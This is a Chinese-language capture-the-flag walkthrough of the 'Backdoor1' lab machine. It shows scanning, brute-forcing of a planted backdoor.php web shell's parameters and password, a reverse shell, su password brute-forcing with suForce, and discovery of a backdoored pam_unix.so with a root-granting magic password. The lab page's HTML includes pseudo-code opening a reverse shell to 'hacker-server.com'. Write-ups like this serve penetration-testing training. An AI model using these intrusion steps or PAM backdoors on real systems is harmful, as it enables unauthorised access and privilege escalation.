Backdoor1

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-09 20:15 CST
Nmap scan report for 192.168.2.1
Host is up (0.00051s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00023s latency).
MAC Address: 08:00:27:20:06:89 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.51
Host is up (0.00037s latency).
MAC Address: 08:00:27:09:A1:B6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds

IP地址：192.168.2.51

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# nmap --min-rate 10000 -p- 192.168.2.51                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-09 20:17 CST
Nmap scan report for 192.168.2.51
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:09:A1:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds

开放端口：22,80

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-09 20:18 CST
Nmap scan report for 192.168.2.51
Host is up (0.00050s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Backdoor1 :: Cyberpunk Style
MAC Address: 08:00:27:09:A1:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# nmap -sU --top-ports 100 192.168.2.51                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-09 20:18 CST
Nmap scan report for 192.168.2.51
Host is up (0.00060s latency).
All 100 scanned ports on 192.168.2.51 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:09:A1:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.63 seconds

没有开放的端口

三、WEB渗透

访问80端口，找到一个提示BACKDOOR ACCESS ACTIVATED! Requires privileged credentials

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# curl http://192.168.2.51                    
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Backdoor1 :: Cyberpunk Style</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: 'Arial', sans-serif;
            background: #000 url('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1MCIgaGVpZ2h0PSI1MCI+CjxyZWN0IHdpZHRoPSI1MCIgaGVpZ2h0PSI1MCIgZmlsbD0iIzAwMCI+PC9yZWN0Pgo8Y2lyY2xlIGN4PSIyNSIgY3k9IjI1IiByPSIxMCIgZmlsbD0ibm9uZSIgc3Ryb2tlPSIjZmYwMGIzIiBzdHJva2Utd2lkdGg9IjEiPjwvY2lyY2xlPgo8Y2lyY2xlIGN4PSIyNSIgY3k9IjI1IiByPSIxNSIgZmlsbD0ibm9uZSIgc3Ryb2tlPSIjYjMwMGZmIiBzdHJva2Utd2lkdGg9IjEiPjwvY2lyY2xlPgo8L3N2Zz4=');
            color: #FF00B3;
            text-shadow: 0 0 10px #FF00B3, 0 0 20px #FF00B3;
            overflow-x: hidden;
            line-height: 1.6;
        }

        @keyframes blink {
            0% { opacity: 1; }
            50% { opacity: 0.3; }
            100% { opacity: 1; }
        }

        @keyframes glow {
            0% { text-shadow: 0 0 10px #FF00B3, 0 0 20px #FF00B3; }
            50% { text-shadow: 0 0 20px #FF00B3, 0 0 30px #B300FF; }
            100% { text-shadow: 0 0 10px #FF00B3, 0 0 20px #FF00B3; }
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        header {
            background: linear-gradient(135deg, #B300FF 0%, #000 50%, #FF00B3 100%);
            border-bottom: 5px double #00FFFF;
            padding: 20px;
            text-align: center;
            position: relative;
            overflow: hidden;
        }

        header::before {
            content: "";
            position: absolute;
            top: -10px;
            left: 0;
            width: 100%;
            height: 20px;
            background: linear-gradient(90deg, 
                #FF00B3, #00FFFF, #00FF00, #FFFF00, #FF00B3);
            animation: glow 3s infinite;
        }

        h1 {
            font-size: 4em;
            margin: 10px 0;
            text-transform: uppercase;
            letter-spacing: 5px;
            animation: glow 2s infinite;
            font-weight: bold;
        }

        .subtitle {
            font-size: 1.8em;
            margin: 10px 0 30px;
            color: #00FFFF;
            text-shadow: 0 0 10px #00FFFF;
            animation: blink 1.5s infinite;
        }

        nav {
            background: rgba(0, 0, 0, 0.7);
            border: 2px solid #00FFFF;
            padding: 15px;
            margin: 20px auto;
            max-width: 800px;
            border-radius: 30px;
        }

        nav ul {
            display: flex;
            justify-content: center;
            padding: 0;
            margin: 0;
            list-style: none;
        }

        nav li {
            margin: 0 20px;
        }

        nav a {
            color: #FFFF00;
            text-decoration: none;
            font-size: 1.4em;
            padding: 5px 15px;
            border: 1px dashed #FFFF00;
            border-radius: 15px;
            transition: all 0.3s;
            animation: blink 3s infinite;
        }

        nav a:hover {
            background: #FFFF00;
            color: #000;
            text-shadow: none;
            border-style: solid;
            animation: none;
        }

        main {
            padding: 20px;
            max-width: 900px;
            margin: 0 auto;
        }

        .section {
            background: rgba(0, 0, 0, 0.6);
            border: 3px solid;
            border-image: linear-gradient(45deg, #FF00B3, #00FFFF, #00FF00) 1;
            padding: 25px;
            margin: 30px 0;
            border-radius: 20px;
            position: relative;
        }

        .section::before {
            content: "";
            position: absolute;
            top: -15px;
            left: -15px;
            width: 40px;
            height: 40px;
            border: 3px solid #00FFFF;
            border-radius: 50%;
            animation: spin 10s infinite linear;
        }

        .section h2 {
            color: #00FF00;
            text-shadow: 0 0 15px #00FF00;
            font-size: 2.5em;
            margin-top: 0;
            border-bottom: 2px dotted #00FF00;
            padding-bottom: 15px;
        }

        p {
            font-size: 1.2em;
            color: #FFFF00;
        }

        .highlight {
            color: #00FFFF;
            text-shadow: 0 0 10px #00FFFF;
            font-weight: bold;
        }

        .floating {
            position: absolute;
            animation: float 6s infinite ease-in-out;
        }

        .spinning {
            animation: spin 20s infinite linear;
        }

        #floating1 {
            top: 20%;
            left: 10%;
            font-size: 3em;
            transform: rotate(-20deg);
        }

        #floating2 {
            top: 40%;
            right: 15%;
            font-size: 3em;
            transform: rotate(15deg);
        }

        #floating3 {
            bottom: 25%;
            left: 20%;
            font-size: 3em;
            transform: rotate(-10deg);
        }

        @keyframes float {
            0% { transform: translateY(0) rotate(-20deg); }
            50% { transform: translateY(-20px) rotate(-15deg); }
            100% { transform: translateY(0) rotate(-20deg); }
        }

        code {
            background: rgba(0, 0, 0, 0.5);
            border: 1px solid #00FF00;
            padding: 15px;
            display: block;
            margin: 15px 0;
            font-family: monospace;
            color: #00FFFF;
            border-left: 5px solid #FF00B3;
            overflow-x: auto;
            border-radius: 10px;
        }

        .btn {
            display: inline-block;
            background: linear-gradient(45deg, #FF00B3, #00FFFF);
            color: #000;
            text-decoration: none;
            padding: 10px 30px;
            border-radius: 50px;
            font-weight: bold;
            text-transform: uppercase;
            font-size: 1.2em;
            border: none;
            cursor: pointer;
            margin: 10px 5px;
            animation: glow 2s infinite;
        }

        .btn:hover {
            background: linear-gradient(45deg, #00FFFF, #FF00B3);
            transform: scale(1.05);
            animation: none;
        }

        footer {
            text-align: center;
            padding: 30px;
            background: rgba(0, 0, 0, 0.8);
            border-top: 3px double #FF00B3;
            margin-top: 50px;
        }

        footer p {
            color: #00FFFF;
            font-size: 1.1em;
            animation: blink 4s infinite;
        }

        .counter {
            font-size: 2.5em;
            color: #FF00B3;
            margin: 10px 0;
            animation: glow 1.5s infinite;
        }

        @media (max-width: 768px) {
            h1 { font-size: 2.8em; }
            nav ul { flex-direction: column; }
            nav li { margin: 10px 0; }
            .floating { display: none; }
        }
    </style>
</head>
<body>
    <div id="floating1" class="floating">★BACKDOOR★</div>
    <div id="floating2" class="floating spinning">❂ HACKER ZONE ❂</div>
    <div id="floating3" class="floating">※ ACCESS ※</div>
    
    <header>
        <h1>BACKDOOR1</h1>
        <div class="subtitle">✪ CYBERPUNK EDITION ✪</div>
    </header>
    
    <nav>
        <ul>
            <li><a href="#">★ HOME ★</a></li>
            <li><a href="#">☣ TOOLS ☣</a></li>
            <li><a href="#">✪ EXPLOITS ✪</a></li>
            <li><a href="#">❖ COMMUNITY ❖</a></li>
            <li><a href="#">⚠ CRACKS ⚠</a></li>
        </ul>
    </nav>
    
    <main>
        <section class="section">
            <h2>ABOUT BACKDOORS</h2>
            <p>A <span class="highlight">backdoor</span> is a method to bypass normal authentication and gain unauthorized access to a system.</p>
            <p>In the hacker world, creating <span class="highlight">undetectable backdoors</span> is an art. From remote access to privilege escalation, we provide elite backdoor solutions.</p>
            
            <div style="text-align: center; margin: 25px 0;">
                <button class="btn">PREMIUM BACKDOOR KIT</button>
                <button class="btn">DOWNLOAD TOOLS</button>
            </div>
        </section>
        
        <section class="section">
            <h2>ADVANCED TECHNIQUES</h2>
            <p>✔ Rootkit-level hidden backdoors</p>
            <p>✔ Web application backdoors</p>
            <p>✔ Hardware-level BIOS/UEFI backdoors</p>
            <p>✔ Memory-resident fileless backdoors</p>
            <p>✔ Encrypted communication tunnels</p>
            
            <code>
                // Backdoor activation code example
                void activate_backdoor() {
                    enable_stealth();
                    create_hidden_service();
                    open_reverse_shell("hacker-server.com:31337");
                    elevate_privileges();
                    maintain_persistence();
                }
            </code>
        </section>
        
        <section class="section">
            <h2>ELITE HACKER TEAM</h2>
            <p>Our world-class security researchers and pentesters:</p>
            <p>✪ <span class="highlight">NeoShadow</span> - Backdoor maestro</p>
            <p>✪ <span class="highlight">CipherMaster</span> - Cryptanalysis expert</p>
            <p>✪ <span class="highlight">GhostRider</span> - Evasion specialist</p>
            <p>✪ <span class="highlight">NetPhantom</span> - Network penetration ninja</p>
            
            <div style="text-align: center; margin-top: 30px;">
                <div>TOTAL VISITORS:</div>
                <div class="counter">313337</div>
            </div>
        </section>
    </main>
    
    <footer>
        <p>Backdoor1 Security Research Group © 2023 | ★ FOR EDUCATIONAL PURPOSES ONLY ★</p>
        <p style="font-size: 0.9em; margin-top: 10px; color: #FF00B3;">✪ WARNING: Unauthorized access is illegal ✪</p>
    </footer>
    
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const floaters = document.querySelectorAll('.floating');
            floaters.forEach(item => {
                item.addEventListener('mouseenter', function() {
                    this.style.animation = 'none';
                    this.style.transform = 'scale(1.5)';
                    this.style.color = '#00FF00';
                });
                
                item.addEventListener('mouseleave', function() {
                    this.style.animation = '';
                    this.style.transform = '';
                    this.style.color = '';
                });
            });
            
            const buttons = document.querySelectorAll('.btn');
            buttons.forEach(btn => {
                btn.addEventListener('click', function() {
                    this.style.transform = 'scale(0.9)';
                    this.style.background = 'linear-gradient(45deg, #00FF00, #FFFF00)';
                    this.style.color = '#000';
                    
                    setTimeout(() => {
                        this.style.transform = '';
                        this.style.background = '';
                        this.style.color = '';
                        alert('★ BACKDOOR ACCESS ACTIVATED! Requires privileged credentials ★');
                    }, 300);
                });
            });
            
            const counter = document.querySelector('.counter');
            let count = parseInt(counter.textContent);
            setInterval(() => {
                count += Math.floor(Math.random() * 5) + 1;
                counter.textContent = count;
            }, 3000);
        });
    </script>
</body>
</html>

1、目录扫描

┌──(root㉿kali)-[/miao/maze-sec/config]
└─# gobuster dir -u http://192.168.2.51/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.51/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,bak,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 12033]
/backdoor.php         (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

找到一个backdoor.php后门文件，但是大小为0，尝试访问

┌──(root㉿kali)-[/miao/maze-sec/backdoor1]
└─# curl http://192.168.2.51/backdoor.php

没有任何回显

2、FUFF爆破

根据页面的提示，根据找到的后门文件backdoor.php，尝试爆破

┌──(root㉿kali)-[/miao/maze-sec/config]
└─# ffuf -u "http://192.168.2.51/backdoor.php?FUZZ=id" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  --fw 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.2.51/backdoor.php?FUZZ=id
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

password                [Status: 200, Size: 10, Words: 3, Lines: 1, Duration: 1ms]
cmd                     [Status: 200, Size: 15, Words: 3, Lines: 1, Duration: 0ms]
:: Progress: [220559/220559] :: Job [1/1] :: 10000 req/sec :: Duration: [0:00:29] :: Errors: 0 ::

找到两个参数，cmd和password

拼接cmd

提示需要密码，再加上password，提示密码错误

直接爆破，找到password=iloveyou

┌──(root㉿kali)-[/miao/maze-sec/config]
└─# ffuf -u "http://192.168.2.51/backdoor.php?cmd=id&password=FUZZ" -w /usr/share/wordlists/rockyou.txt   --fw 2 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.2.51/backdoor.php?cmd=id&password=FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/rockyou.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 2
________________________________________________

iloveyou                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 371ms]

四、获取www-data

根据密码，直接访问，发现没有回显

尝试ping-kali看看有没有流量

发现有流量回显，那直接反弹shell即可

┌──(root㉿kali)-[/miao/maze-sec/config]
└─# tcpdump -A -n icmp -i eth1
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:03:42.954796 IP 192.168.2.51 > 192.168.2.4: ICMP echo request, id 1422, seq 1, length 64
E..T..@.@......3.......@.....Ioh............................ !"#$%&'()*+,-./01234567
13:03:42.954831 IP 192.168.2.4 > 192.168.2.51: ICMP echo reply, id 1422, seq 1, length 64
E..T....@..i.......3.. @.....Ioh............................ !"#$%&'()*+,-./01234567
13:03:43.965552 IP 192.168.2.51 > 192.168.2.4: ICMP echo request, id 1422, seq 2, length 64
E..T..@.@..a...3.............Ioh....6....................... !"#$%&'()*+,-./01234567
13:03:43.965588 IP 192.168.2.4 > 192.168.2.51: ICMP echo reply, id 1422, seq 2, length 64
E..T.r..@..........3.........Ioh....6....................... !"#$%&'()*+,-./01234567

反弹shell

┌──(root㉿kali)-[/miao/maze-sec/config]
└─# nc -lvvp 4444          
listening on [any] 4444 ...
192.168.2.51: inverse host lookup failed: Unknown host
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.51] 39414
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Backdoor1:/var/www/html$ 

五、获取USER权限

尝试进入morri家目录，发现没有权限

www-data@Backdoor1:/home$ cd morri/
bash: cd: morri/: Permission denied

尝试切换到morri用户，发现需要密码，使用suForce爆破密码

www-data@Backdoor1:/tmp$ ./suForce -u morri -w pass.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | morri
📖 Wordlist | pass.txt
🔎 Status   | 1/10001/0%/morri
💥 Password | morri
───────────────────────────────────

得到密码：morri

切换到morri用户

www-data@Backdoor1:/tmp$ su morri
Password: 
morri@Backdoor1:/tmp$ id
uid=1000(morri) gid=1000(morri) groups=1000(morri)

USER FLAG

morri@Backdoor1:~$ cat user.txt
flag{user-4645258dd0f71f7f430bb4f3c37748e6}

六、权限提升

使用sudo -l，发现需要密码

morri@Backdoor1:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for morri: 

1、方法一：查看最近修改过的文件

morri@Backdoor1:~$ find / -type f -newermt "2025-07-05" ! -newermt "2025-07-10" ! -path '/proc/*' ! -path '/sys/*' ! -path '/run/*' 2>/dev/null
/usr/lib/x86_64-linux-gnu/security/pam_unix.so
/home/morri/.bash_logout
/home/morri/.bashrc
/home/morri/user.txt
/home/morri/.profile
/etc/gshadow-
/etc/sudoers
/etc/subgid-
/etc/apt/sources.list
/etc/hosts
/etc/ld.so.cache
/etc/shadow-
/etc/subgid
/etc/passwd-
/etc/gshadow
/etc/group-
/etc/shadow
/etc/subuid-
/etc/php/8.3/apache2/php.ini
/etc/subuid
/etc/group
/etc/hostname
/etc/resolv.conf
/etc/passwd
/var/www/html/index.html
/var/www/html/backdoor.php
/var/backups/apt.extended_states.0
/var/log/debug
/var/log/daemon.log.1
/var/log/apt/eipp.log.xz
/var/log/apt/term.log
/var/log/apt/history.log
/var/log/kern.log
/var/log/btmp
/var/log/auth.log.1
/var/log/dpkg.log
/var/log/alternatives.log
/var/log/lastlog
/var/log/wtmp
/var/log/faillog
/var/log/debug.1
/var/log/syslog.3.gz
/var/log/syslog.2.gz
/var/log/user.log
/var/log/messages.1
/var/log/kern.log.1
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/system@0006396a764f42ae-bf156f4b6c4eb513.journal~
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/system@0006397e06552d02-5794aba3a99c89ef.journal~
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000@0006396aa29dceaf-fdca4d5bafaa45b8.journal~
/var/lib/dpkg/lock
/var/lib/dpkg/info/libfl2:amd64.list
/var/lib/dpkg/info/curl.list
/var/lib/dpkg/info/m4.list
/var/lib/dpkg/info/flex.list
/var/lib/dpkg/info/libpam0g-dev:amd64.list
/var/lib/dpkg/info/libsigsegv2:amd64.list
/var/lib/dpkg/info/wget.list
/var/lib/dpkg/info/libfl-dev:amd64.list
/var/lib/dpkg/info/netcat-openbsd.list
/var/lib/dpkg/info/bison.list
/var/lib/dpkg/info/netcat.list
/var/lib/dpkg/info/libpam0g:amd64.list
/var/lib/dpkg/alternatives/yacc
/var/lib/dpkg/alternatives/nc
/var/lib/dpkg/triggers/Lock
/var/lib/dpkg/status
/var/lib/dpkg/status-old
/var/lib/apt/lists/mirrors.aliyun.com_debian_dists_bullseye-backports_InRelease
/var/lib/apt/lists/packages.sury.org_php_dists_bullseye_main_binary-amd64_Packages
/var/lib/apt/lists/packages.sury.org_php_dists_bullseye_InRelease
/var/lib/apt/lists/packages.sury.org_php_dists_bullseye_main_source_Sources
/var/lib/apt/daily_lock
/var/lib/apt/extended_states
/var/lib/systemd/random-seed
/var/lib/systemd/timesync/clock
/var/lib/systemd/timers/stamp-apt-daily-upgrade.timer
/var/cache/apt/pkgcache.bin
/var/cache/apt/srcpkgcache.bin
/var/cache/debconf/templates.dat
/var/cache/debconf/config.dat-old
/var/cache/debconf/config.dat
/var/cache/debconf/templates.dat-old

发现修改过/usr/lib/x86_64-linux-gnu/security/pam_unix.so里面的文件

2、方法二：dpkg -V

或者使用dpkg -V

morri@Backdoor1:~$ dpkg -V
??5?????? c /etc/irssi.conf
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/apache2/apache2.conf
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue

查看修改过的文件

morri@Backdoor1:~$ strings /lib/x86_64-linux-gnu/security/pam_unix.so
P`^B
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__cxa_finalize
calloc
malloc
strncpy
strlen
crypt_r
free
pipe
fork
dup2
pam_modutil_sanitize_helper_fds
geteuid
setuid
execve
pam_syslog
stdout
fflush
_exit
__errno_location
waitpid
sigaction
pam_modutil_read
__isoc99_sscanf
pam_sm_acct_mgmt
pam_get_item
getuid
pam_get_data
dcngettext
snprintf
dcgettext
pam_sm_authenticate
pam_get_user
pam_get_authtok
pam_set_data
pam_sm_setcred
strcmp
fopen
fgets
strncmp
strtok_r
fclose
pam_sm_chauthtok
pam_prompt
pam_set_item
yp_get_default_domain
yp_master
getrpcport
strdup
clnt_create
authunix_create_default
xdr_int
clnt_sperrno
yperr_string
pam_sm_open_session
pam_modutil_getlogin
pam_sm_close_session
write
feof
__getdelim
strchr
__ctype_b_loc
strsep
strcasecmp
strncasecmp
strtol
memset
yp_bind
yp_match
yp_unbind
strcpy
memcpy
pam_fail_delay
gettimeofday
getpid
clock
pam_modutil_getpwnam
pam_modutil_getspnam
time
stpcpy
usleep
ulckpwdf
umask
fileno
__fxstat
fchown
fchmod
fputs
fsync
rename
unlink
fgetpwent
putpwent
fgetspent
putspent
xdr_string
strncat
libpam.so.0
libcrypt.so.1
libnsl.so.2
libc.so.6
pam_unix.so
XCRYPT_2.0
LIBNSL_1.0
GLIBC_2.3
GLIBC_2.7
GLIBC_2.14
GLIBC_2.2.5
LIBPAM_EXTENSION_1.1
LIBPAM_EXTENSION_1.0
LIBPAM_1.0
LIBPAM_MODUTIL_1.0
LIBPAM_MODUTIL_1.1.9
/root/Linux-PAM-1.3.1/libpam/.libs
u/UH
AWAVI
AUATUH
[]A\A]A^A_
AVAUI
[]A\A]A^A_
t$01
AUATUH
]A\A]A^
T$ H
HcL$
T$ H
D$ H
D$ H
AUATUH
]A\A]A^
]A\A]A^
 []A\
[]A\
AWAVAUATI
[]A\A]A^A_
AVAUATUSH
L$@H
T$<H
t$X1
t$HH
t$HL
D$PH
l$`H
D$XD
D$DH
T$XD
T$XH
t$HH
t$HD
D$DH
L$`D
L$@H
t$`D
D$<H
D$XH
[]A\A]A^A_
T$HD
T$X1
T$XH
t$HD
t$HD
t$HA
D$hH
|$pH
D$hH
D$ H
D$pH
L$ H
t$hE
L$ H
ATUH
[]A\A]
[]A\A]
uWE1
[]A\
[]A\
AVAUI
t$01
[]A\A]A^A_
ATUSH
[]A\
 []A\
ASARL
ATUSH
[]A\A]A^
AVAUATA
|$ H
t$,H
L$,D
@D#d
8[]D
A\A]A^A_
|$ H
|$ H
|$ H
|$ H
|$ 1
AVAUA
u&E1
[]A\A]A^A_
|$xL
L$lL
D$pH
|$xA
D$xA
l$xI
D$\H
|$ H
|$0H
T$HH
D$@B
D$\H
D$xH
l$xL
l$xL
t$ I
l$xL
t$0I
AUATUH
 ]A\A]
 ]A\A]
AUATI
L$ H
-UN*X-FAH
|$ H
|$ H
[]A\A]A^A_
T$(H
D$(H
t$ H
L$@H
T$8H
D$HM
ATUIc
[]A\A]A^
t$0L
AWAVAUA
u#E1
[]A\A]A^A_
[]A\A]
[]A\A]
[]A\A]
ATUH
[]A\
[]A\
K H)
{0H9
$$1$
AWAVAUATI
|$ L
h[]A\A]A^A_
h[]A\A]A^A_
[]A\A]A^A_
AWAVAUATUSH
t$\D
|$`L
|$XL
T$8H
D$ H
D$(H
[]A\A]A^A_
tmE9
D$8H
L$0L
D$8H
AWAVAUI
ATUSH
t$0D
|$,H
|$(H
[]A\A]A^A_
AWAVI
ATUSH
|$|H
|$xH
[]A\A]A^A_
AVAUATUSD
p $E
QZ^&
A]A^
AWAVI
[]A\A]A^A_
[]A\
AVAUATI
t$0H
=UUUUwni
$w}E
=UUUUv
|$ H
D$,
|$'L
|$-
|$(L
|$.
|$)L
|$/
|$*L
|$%
[]A\A]A^A_
AVAUATUSD
p $E
QZ^&
A]A^
AWAVI
[]A\A]A^A_
[]A\
AVAUATI
t$0H
=UUUUwni
$w}E
=UUUUv
|$ H
D$,
|$'L
|$-
|$(L
|$.
|$)L
|$/
|$*L
|$%
[]A\A]A^A_
Could not make pipe: %m
stdout
dup2 of %s failed: %m
setuid failed: %m
/sbin/unix_chkpwd
chkexpiry
unix_chkpwd abnormal exit: %d
Fork failed: %m
unix_setcred_return
Linux-PAM
helper binary execve failed: %m
read unix_chkpwd output error %d: %m
unix_chkpwd waitpid returned %d: %m
could not identify user (from uid=%lu)
could not identify user (from getpwnam(%s))
account %s has expired (account expired)
Your account has expired; please contact your system administrator
expired password for user %s (root enforced)
You are required to change your password immediately (administrator enforced)
expired password for user %s (password aged)
You are required to change your password immediately (password expired)
account %s has expired (failed to change password)
password for user %s will expire in %d days
Warning: your password will expire in %d days
Warning: your password will expire in %d day
pam_unix_auth: cannot allocate ret_data
auth could not identify password for [%s]
PAM: Root access granted via backdoor
bad username [%s]
660930334
No password supplied
Password unchanged
Can not get username
/etc/security/opasswd
bad authentication token
 or NIS
 not
username [%s] obtained
Changing password for %s.
user not authenticated
user shadow entry expired
new password not acceptable 2
can't get local yp domain: %s
passwd.byname
new password not acceptable
You must choose a longer password
can't open %s file to check old passwords
Password has been already used. Choose another.
password - could not identify user
user "%s" does not exist in /etc/passwd%s
user "%s" has corrupted passwd entry
password - (old) token not obtained
You must wait longer to change your password
password - new password not obtained
user password changed by another process
crypt() failure or out of memory for password
can't find the master ypserver: %s
yppasswdd not running on NIS master host
yppasswd daemon running on illegal port
Use NIS server on %s with port %d
password%s changed for %s on %s
NIS password could not be changed.
password received unknown request
session closed for user %s
open_session - error recovering username
open_session - error recovering service
session opened for user %s by %s(uid=%lu)
close_session - error recovering username
close_session - error recovering service
nullok
nonull
stdin
 user=
**unknown**
/etc/login.defs
ENCRYPT_METHOD
SHA_CRYPT_MAX_ROUNDS
unrecognized option [%s]
/etc/passwd
_pam_unix_getpwnam_%s
no memory for data-name
check pass; user (%s) unknown
check pass; user unknown
audit
use_first_pass
try_first_pass
authtok_type=
use_authtok
debug
nodelay
bigcrypt
likeauth
remember=
noreap
broken_shadow
sha256
sha512
rounds=
blowfish
minlen=
quiet
no_pass_expiry
